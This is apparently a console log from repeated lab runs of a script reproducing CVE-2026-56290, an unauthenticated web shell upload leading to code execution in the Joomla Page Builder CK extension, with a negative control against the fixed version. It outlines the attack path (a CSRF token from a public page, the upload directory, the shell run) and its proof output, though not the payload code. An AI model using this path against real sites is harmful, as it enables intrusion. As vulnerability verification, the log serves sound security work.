[10:34:25] ============================================ [10:34:25] CVE-2026-56290 Reproduction Script [10:34:25] Page Builder CK Unauthenticated File Upload to RCE [10:34:25] ============================================ [10:34:25] Step 0: Checking prerequisites... [10:34:25] Step 1: Writing docker-compose.yml... [10:34:25] Step 2: Starting Docker containers... time="2026-07-05T10:34:25Z" level=warning msg="/data/pruva/runs/6a6e1a0a-880e-417b-a2af-2bc017a4c715/bundle/docker-compose.yml: the attribute `version` is obsolete, it will be ignored, please remove it to avoid potential confusion" Network bundle_joomlanet Creating Network bundle_joomlanet Created Volume "bundle_db_data" Creating Volume "bundle_db_data" Created Volume "bundle_joomla_data" Creating Volume "bundle_joomla_data" Created Container bundle-db-1 Creating Container bundle-db-1 Created Container bundle-joomla-1 Creating Container bundle-joomla-1 Created Container bundle-db-1 Starting Container bundle-db-1 Started Container bundle-joomla-1 Starting Container bundle-joomla-1 Started [10:34:26] Waiting for containers to start... [10:34:39] Joomla is ready! [10:34:39] Step 3: Installing Joomla via CLI... Install Joomla ============== Checking system requirements...OK Collecting configuration... Encryption for the database connection. Values: 0=None, 1=One way, 2=Two way [0]: > OK Validating DB connection...OK Creating and populating the database...OK Writing configuration.php and additional setup ...OK Deleting /installation folder...OK [OK] Joomla has been installed [10:34:45] Joomla installed successfully. [10:34:45] Step 4: Installing Page Builder CK extension... Install Extension ================= [OK] Extension installed successfully. [10:34:46] Extension installed: com_pagebuilderck 245 3.6.1 component Yes [10:34:46] Step 5: Fixing permissions on media directory... [10:34:46] Permissions fixed. [10:34:46] Step 6: Reverting security fix (CKFof::checkSecurity() calls)... No syntax errors detected in /var/www/html/administrator/components/com_pagebuilderck/helpers/ckbrowse.php No syntax errors detected in /var/www/html/administrator/components/com_pagebuilderck/controllers/browse.php No syntax errors detected in /var/www/html/administrator/components/com_pagebuilderck/helpers/ckcontroller.php [10:34:47] Security fix reverted. Vulnerable version recreated. [10:34:47] Step 7: Exploiting unauthenticated file upload... CSRF Token from public page: a6c5153c226c22b4c8dd9529cc0644ce [10:34:47] CSRF Token obtained from public page: a6c5153c226c22b4c8dd9529cc0644ce [10:34:47] Uploading PHP web shell via unauthenticated endpoint... {"error" : "Unable to get the file, please check the settings of your server and the size of your image"} [10:34:47] Upload response: {"error" : "Unable to get the file, please check the settings of your server and the size of your image"} [10:34:47] Verifying uploaded file on disk... ls: cannot access '/var/www/html/media/com_pagebuilderck/gfonts/exploit_shell.php': No such file or directory [10:35:30] ============================================ [10:35:30] CVE-2026-56290 Reproduction Script [10:35:30] Page Builder CK Unauthenticated File Upload to RCE [10:35:30] ============================================ [10:35:30] Step 0: Checking prerequisites... [10:35:30] Step 1: Writing docker-compose.yml... [10:35:30] Step 2: Starting Docker containers... Network bundle_joomlanet Creating Network bundle_joomlanet Created Volume "bundle_db_data" Creating Volume "bundle_db_data" Created Volume "bundle_joomla_data" Creating Volume "bundle_joomla_data" Created Container bundle-db-1 Creating Container bundle-db-1 Created Container bundle-joomla-1 Creating Container bundle-joomla-1 Created Container bundle-db-1 Starting Container bundle-db-1 Started Container bundle-joomla-1 Starting Container bundle-joomla-1 Started [10:35:31] Waiting for containers to start... [10:35:44] Joomla is ready! [10:35:44] Step 3: Installing Joomla via CLI... Install Joomla ============== Checking system requirements...OK Collecting configuration... Encryption for the database connection. Values: 0=None, 1=One way, 2=Two way [0]: > OK Validating DB connection...OK Creating and populating the database...OK Writing configuration.php and additional setup ...OK Deleting /installation folder...OK [OK] Joomla has been installed [10:35:50] Joomla installed successfully. [10:35:50] Step 4: Installing Page Builder CK extension... Install Extension ================= [OK] Extension installed successfully. [10:35:51] Extension installed: com_pagebuilderck 245 3.6.1 component Yes [10:35:51] Step 5: Fixing permissions on media directory... [10:35:51] Permissions fixed. [10:35:51] Step 6: Reverting security fix (CKFof::checkSecurity() calls)... Patched: file retrieval -> $_FILES direct Patched: path retrieval -> $_REQUEST direct Done patching /var/www/html/administrator/components/com_pagebuilderck/helpers/ckbrowse.php No syntax errors detected in /var/www/html/administrator/components/com_pagebuilderck/helpers/ckbrowse.php No syntax errors detected in /var/www/html/administrator/components/com_pagebuilderck/controllers/browse.php No syntax errors detected in /var/www/html/administrator/components/com_pagebuilderck/helpers/ckcontroller.php [10:35:52] Security fix reverted. Vulnerable version recreated. [10:35:52] Step 7: Exploiting unauthenticated file upload... [10:35:52] Getting CSRF token from public page and uploading web shell... CSRF Token from public page: e661c52c26ff091e1b04e2ff545de328 Upload response: {"img" : "/media/com_pagebuilderck/gfonts/exploit_shell.php", "filename" : "exploit_shell.php"} [10:35:52] Upload result: CSRF Token from public page: e661c52c26ff091e1b04e2ff545de328 Upload response: {"img" : "/media/com_pagebuilderck/gfonts/exploit_shell.php", "filename" : "exploit_shell.php"} [10:35:52] Verifying uploaded file on disk... -rw-r--r-- 1 www-data www-data 72 Jul 5 10:35 /var/www/html/media/com_pagebuilderck/gfonts/exploit_shell.php [10:35:52] Accessing uploaded web shell for RCE proof... RCE_PROOF_1783247752Linux 8f64df701b71 7.0.14-arch1-1 #1 SMP PREEMPT_DYNAMIC Sat, 27 Jun 2026 16:15:10 +0000 x86_64_www-data [10:35:52] RCE output: RCE_PROOF_1783247752Linux 8f64df701b71 7.0.14-arch1-1 #1 SMP PREEMPT_DYNAMIC Sat, 27 Jun 2026 16:15:10 +0000 x86_64_www-data [10:35:52] Step 8: Testing negative control (fixed version)... [10:35:52] Fixed version response: 403 [10:35:52] Step 9: Analyzing results... [10:35:52] SUCCESS: RCE CONFIRMED! Web shell executed and returned server info. [10:35:52] SUCCESS: File upload succeeded (unauthenticated). [10:35:52] SUCCESS: Fixed version correctly blocks upload with 403. [10:35:52] Step 10: Writing runtime manifest... [10:36:54] ============================================ [10:36:54] CVE-2026-56290 Reproduction Script [10:36:54] Page Builder CK Unauthenticated File Upload to RCE [10:36:54] ============================================ [10:36:54] Step 0: Checking prerequisites... [10:36:54] Step 1: Writing docker-compose.yml... [10:36:54] Step 2: Starting Docker containers... Network bundle_joomlanet Creating Network bundle_joomlanet Created Volume "bundle_joomla_data" Creating Volume "bundle_joomla_data" Created Volume "bundle_db_data" Creating Volume "bundle_db_data" Created Container bundle-db-1 Creating Container bundle-db-1 Created Container bundle-joomla-1 Creating Container bundle-joomla-1 Created Container bundle-db-1 Starting Container bundle-db-1 Started Container bundle-joomla-1 Starting Container bundle-joomla-1 Started [10:36:55] Waiting for containers to start... [10:37:08] Joomla is ready! [10:37:08] Step 3: Installing Joomla via CLI... Install Joomla ============== Checking system requirements...OK Collecting configuration... Encryption for the database connection. Values: 0=None, 1=One way, 2=Two way [0]: > OK Validating DB connection...OK Creating and populating the database...OK Writing configuration.php and additional setup ...OK Deleting /installation folder...OK [OK] Joomla has been installed [10:37:14] Joomla installed successfully. [10:37:14] Step 4: Installing Page Builder CK extension... Install Extension ================= [OK] Extension installed successfully. [10:37:15] Extension installed: com_pagebuilderck 245 3.6.1 component Yes [10:37:15] Step 5: Fixing permissions on media directory... [10:37:15] Permissions fixed. [10:37:15] Step 6: Reverting security fix (CKFof::checkSecurity() calls)... [10:38:22] ============================================ [10:38:22] CVE-2026-56290 Reproduction Script [10:38:22] Page Builder CK Unauthenticated File Upload to RCE [10:38:22] ============================================ [10:38:22] Step 0: Checking prerequisites... [10:38:22] Step 1: Writing docker-compose.yml... [10:38:22] Step 2: Starting Docker containers... Network bundle_joomlanet Creating Network bundle_joomlanet Created Volume "bundle_joomla_data" Creating Volume "bundle_joomla_data" Created Volume "bundle_db_data" Creating Volume "bundle_db_data" Created Container bundle-db-1 Creating Container bundle-db-1 Created Container bundle-joomla-1 Creating Container bundle-joomla-1 Created Container bundle-db-1 Starting Container bundle-db-1 Started Container bundle-joomla-1 Starting Container bundle-joomla-1 Started [10:38:23] Waiting for containers to start... [10:38:35] Joomla is ready! [10:38:35] Step 3: Installing Joomla via CLI... Install Joomla ============== Checking system requirements...OK Collecting configuration... Encryption for the database connection. Values: 0=None, 1=One way, 2=Two way [0]: > OK Validating DB connection...OK Creating and populating the database...OK Writing configuration.php and additional setup ...OK Deleting /installation folder...OK [OK] Joomla has been installed [10:38:42] Joomla installed successfully. [10:38:42] Step 4: Installing Page Builder CK extension... Install Extension ================= [OK] Extension installed successfully. [10:38:43] Extension installed: com_pagebuilderck 245 3.6.1 component Yes [10:38:43] Step 5: Fixing permissions on media directory... [10:38:43] Permissions fixed. [10:38:43] Step 6: Reverting security fix (CKFof::checkSecurity() calls)... Patched: file retrieval -> $_FILES direct Patched: path retrieval -> $_REQUEST direct Done patching /var/www/html/administrator/components/com_pagebuilderck/helpers/ckbrowse.php No syntax errors detected in /var/www/html/administrator/components/com_pagebuilderck/helpers/ckbrowse.php No syntax errors detected in /var/www/html/administrator/components/com_pagebuilderck/controllers/browse.php No syntax errors detected in /var/www/html/administrator/components/com_pagebuilderck/helpers/ckcontroller.php [10:38:43] Security fix reverted. Vulnerable version recreated. [10:38:43] Step 7: Exploiting unauthenticated file upload... [10:38:43] Getting CSRF token from public page and uploading web shell... CSRF Token from public page: 0136d31f4713dbb1b7608383f5508dc6 Upload response: {"img" : "/media/com_pagebuilderck/gfonts/exploit_shell.php", "filename" : "exploit_shell.php"} [10:38:43] Upload result: CSRF Token from public page: 0136d31f4713dbb1b7608383f5508dc6 Upload response: {"img" : "/media/com_pagebuilderck/gfonts/exploit_shell.php", "filename" : "exploit_shell.php"} [10:38:43] Verifying uploaded file on disk... -rw-r--r-- 1 www-data www-data 72 Jul 5 10:38 /var/www/html/media/com_pagebuilderck/gfonts/exploit_shell.php [10:38:43] Accessing uploaded web shell for RCE proof... RCE_PROOF_1783247923Linux a32046ad96c2 7.0.14-arch1-1 #1 SMP PREEMPT_DYNAMIC Sat, 27 Jun 2026 16:15:10 +0000 x86_64_www-data [10:38:43] RCE output: RCE_PROOF_1783247923Linux a32046ad96c2 7.0.14-arch1-1 #1 SMP PREEMPT_DYNAMIC Sat, 27 Jun 2026 16:15:10 +0000 x86_64_www-data [10:38:44] Step 8: Testing negative control (fixed version)... [10:38:44] Fixed version response: 403 [10:38:44] Step 9: Analyzing results... [10:38:44] SUCCESS: RCE CONFIRMED! Web shell executed and returned server info. [10:38:44] SUCCESS: File upload succeeded (unauthenticated). [10:38:44] SUCCESS: Fixed version correctly blocks upload with 403. [10:38:44] Step 10: Writing runtime manifest... [10:38:44] ============================================ [10:38:44] REPRODUCTION SUMMARY [10:38:44] ============================================ [10:38:44] Vulnerable version upload: true [10:38:44] Vulnerable version RCE: true [10:38:44] Fixed version blocked (403): true [10:38:44] ============================================ [10:38:44] VERDICT: CVE-2026-56290 CONFIRMED - Unauthenticated file upload to RCE